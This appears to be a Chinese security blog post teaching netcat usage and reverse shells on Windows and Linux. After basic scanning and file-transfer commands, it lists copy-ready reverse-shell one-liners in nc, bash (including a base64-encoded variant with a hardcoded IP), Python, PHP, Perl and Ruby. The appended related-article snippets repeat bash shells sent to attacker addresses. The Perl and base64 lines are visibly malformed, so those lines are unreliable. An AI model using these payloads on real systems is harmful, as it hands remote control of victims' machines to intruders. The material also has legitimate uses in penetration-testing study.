Windows/Linux 下nc 反弹shell

最新推荐文章于 2025-10-20 17:07:30 发布
原创 最新推荐文章于 2025-10-20 17:07:30 发布 · 1.5w 阅读 · 30 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#nc #反弹shll

本文介绍了netcat(nc)在Windows和Linux系统下如何实现反弹shell的操作,包括nc的基本概念、反弹shell的原理以及如何利用nc与其他编程语言配合进行反弹shell。还提到了在没有nc的情况下,可以使用Bash、Python、PHP、Perl和Ruby等工具实现。

Windows/Linux 下nc 反弹shell

 高二那年班主任对我们说:其实我并不反对你们谈恋爱,
	                 只是你们记得要找一个有担当的,
	                     那些一看见老师就松开你手的,要来有什么用?

NC概述:

  • nc又名netcat,一个简单而有用的工具,可以干很多事情,但是不可以吃。
  • 何为反弹shell?为什么不反弹攻击?
    相信你有一天可以直接把所有攻击反弹回去的.

常用命令

banner获取

nc -nv ip port

连接远程主机

nc -nvv ip port

端口扫描

nc -v ip port            //指定端口
nc -v -z  ip 1-1555         //指定端口段

文件传输

nc  -lvp  8888 < test.txt  服务端
nc -nv 服务端ip 8888 > test.txt 客户端

获取shell

正向shell:客户端想要获取服务器shell

	客户端监听
nc -lvp 8888 -e /bin/sh 
nc -lvp 8888 -e c:\windows\system32\cmd.exe 
	服务端反弹
	nc 服务端ip 8888

反向shell:服务端想要获取客户端器shell

客户端监听
nc -lvp 8888 
服务端反弹
nc ip 8888 -e /bin/sh 
nc ip 8888 -e c:\windows\system32\cmd.exe

没有nc是,由于各种环境不同,可以结合天时地利人和。

  • Bash
bash -i >& /dev/tcp/ip/port 0>&1
base64版 
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEzNy4xMzUvNzg5MCAwPiYx|{base64,-d}|{bash,-i}'
  • python
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
  • php
php -r '$sock=fsockopen("ip",port);exec("/bin/sh -i <&3 >&3 2>&3");'
  • perl
Socket;$i="ip";$p=port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
  • ruby
ruby -rsocket -e'f=TCPSocket.open("ip",port).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
  • nc反弹nc
nc -e /bin/bash ip port

成功反弹shll
在这里插入图片描述

余生很长,请多指教。
在这里插入图片描述

Linux/Windows反弹shell
weixin_45253622的博客
05-28 2726
目录食用 Linux反弹shell bash反弹 加密bash反弹shell的流量 Python反弹 nc反弹 Telnet反弹 socat反弹 其他命令反弹 Windows反弹shell Powershell反弹nc shell 使用MSF反弹shell Linux反弹shell 攻击机:192.168.41.142 靶机:192.168.41.138 bash反弹 Linux 反弹 shell 使用下面这条命令,该命令弹回来的shell是不可交互的,也就是比如vim...
Linux反弹shell
渗透之路,攻防之间皆学问
04-21 4547
在渗透过程中,目标处于内网环境,或因为端口限制而我们无法直连目标机器,此时需要通过反弹shell来让目标机器主动连接我们获取一个交互式shell,以便继续深入。记录几个常用的。
LinuxNC反弹shell命令(推荐)
09-15
主要介绍了LinuxNC反弹shell命令,非常不错,具有参考借鉴价值,需要的的朋友参考下吧
Windows反弹Shell
qq_62073002的博客
04-26 1385
正向shell: 控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。反向shell(反弹shell)︰ 被控端主动发起连接请求去连接控制端,通常被控端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。靶机:win11攻击机:vps。
渗透测试常用反弹shell方法(如何渗透测试反弹shell)—Windows篇渗透测试!
最新发布
qq_41314882的博客
10-20 1118
反弹Shell是一种让攻击者远程控制目标主机的技术,分为正向反弹(控制端连接目标)和反向反弹(目标主动连接控制端)。常用工具有NetCat(NC)、mshta.exe和rundll32.exe。NC反弹需要上传工具到目标主机,通过监听端口实现控制。mshta.exe利用HTA文件执行恶意脚本,可通过Metasploit或Cobalt Strike生成木马文件。rundll32.exe则通过调用DLL文件实现攻击,需配合Metasploit模块使用。反向反弹能绕过防火墙限制,是更常用的方法。这些技术可帮助渗透
反弹shell的方法和场景
weixin_45653478的博客
04-01 2161
nc64.exe -lvvp 1111 -e C:\Windows\System32\cmd.exe windows机器nc64.exe -lvvp 1111 -e /bin/bash linux机器。
NC反弹shell
Palpitate_LL的博客
09-13 1251
c 指定连接后要执行的shell命令-e 指定连接后要执行的文件名-l 监听模式-p 设置本地使用的通信端口-u 使用UDP传输协议,默认是TCP-v 显示命令执行过程,使用-vv显示更详细信息。
nc--反弹shell
wzhua的博客
08-04 3404
nc--反弹shell,小实验
Php shell端口反弹,Linux下通过webshell反弹shell总结
weixin_33253503的博客
03-12 569
反弹shell原因:Linux提权绝大部分都靠的是Local Exploit。WebShell一般都可以执行命令,但是溢出必须在可交互环境运行,否则如果直接在WebShell执行,即使能溢出提权成功,也没法 利用。因此必须要反弹一个Shell命令行窗口,在命令行终端下执行溢出进行提权。nc命令参数:参  数:-g设置路由器跃程通信网关,最丢哦可设置8个。-G设置来源路由指向器,其数值为...
反弹shell的方式——之NC反弹shell
aihua002的博客
07-24 977
反弹shell是指在攻击机监听某个端口,然后通过目标连接攻击机监听的端口,在攻击机反弹得到目标机的shell。通常在目标网络有防火墙或者其他因素限制,导致无法持续控制目标,或者执行命令受阻等情况时需要进行反弹shell
利用NC反弹shell
Chales123的博客
01-17 663
正常情况下shell只能由主机的用户使用,但是反弹shell的目的则是将自己的shell反弹给别的主机,让别的主机可以通过shell来控制自己。举例:假设我们攻击了一台主机,打开了该主机的一个端口,攻击者在自己的主机上去连接目标机器(目标ip:目标机器端口),这是比较常规的方式,叫做正向连接。4.对于病毒、木马,受害者什么时候能中招、对方的网络环境是什么样的、什么时候开关机等情况都是未知的,所以建立一个服务端让恶意程序主动连接,才是最好的办法。2.目标主机的ip是动态改变的,不能持续控制。
详解NC反弹shell的几种方法
01-08
假如ubuntu、CentOS为目标服务器系统 kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用 最终是将ubuntu、CentOS的shell反弹到kali上 正向反弹shell ubuntu或者CentOS上面输入 nc -lvp 7777 -e /bin/bash kali上输入 nc ip 7777 正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell。 需要目标机安装nc。 反向反弹shell 方法1:bash反弹 bash -i >& /dev/tcp/ip/port 0>&1 但首先需要在kali上使用
利用nc反弹cmdshell提权
01-27
利用nc反弹cmdshell提权 利用nc反弹cmdshell提权 利用nc反弹cmdshell提权
使用nc反弹shell方法
baidu_33260220的博客
05-08 6708
hacker机:192.168.1.1 目标机:192.168.1.2 1、在hacker机执行 nc -vlp 9999  (监听本机9999端口) 2、在目标机执行 bash -i >& /dev/tcp/192.168.1.1/9999 0>&1 成功反弹shell
NC反弹Shell
收集盒 Book box
08-30 3058
使用NC反弹Shell 在进行Shell反弹时,有时会碰到服务器不支持PHP或者WebShell无法成功反弹Shell的情况,例如有的服务器只支持JSP,不支持PHP。此时,可以同样采用Windows下的经典的NC反弹Shell方法。 在Windows反弹CmdSh
nc的使用+反弹shell
2301_80366980的博客
02-18 1856
记录学习linuxnc的使用,以及反弹shell仅供个人学习,如有冒犯请尽快联系。
NC(瑞士军刀)反弹shell使用教程,实操演示,保姆级教学
2301_79015613的博客
03-14 2608
简介:nc瑞士军刀,通常被称为netcat或简称nc,是一个被誉为网络安全界的“瑞士军刀”的实用工具。它利用TCP或UDP协议的网络连接来读写数据,具有多种强大的功能,使用也相对简单,只需两台装有nc的PC,就可以进行各种网络操作。例如,通过监听特定端口,可以实现电子取证PC与电子取证设备之间的通信和数据同步。下面是nc的常用参数。
[保姆级教程]-通过NC反弹shell实战
qq_43681532的博客
02-19 544
环境工具步骤。
使用 `nc` (netcat) 进行 shell 反弹
suanfa_student的博客
02-15 271
ncnc
Linux下如何通过NC反弹shell
05-27
可以通过以下步骤在 Linux 下使用 NC 反弹 shell: 1. 在攻击机器上开放一个监听端口等待连接:`nc -lvp <port>` 2. 在受害机器上执行以下命令,将 shell 通过 NC 连接到攻击机器上: ``` /bin/bash -c "/bin/bash -i >& /dev/tcp/<attacker_ip>/<port> 0>&1" ``` 其中,`<attacker_ip>` 是攻击机器的 IP 地址,`<port>` 是攻击机器上开放的监听端口。 3. 在攻击机器上,当受害机器连接成功后,就可以通过该连接获得 shell。 注意:在执行以上操作时,请务必确认你的行为符合当地法律法规。此外,这种技术可能会被安全软件识别并拦截,建议仅在法律允许的情况下使用。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值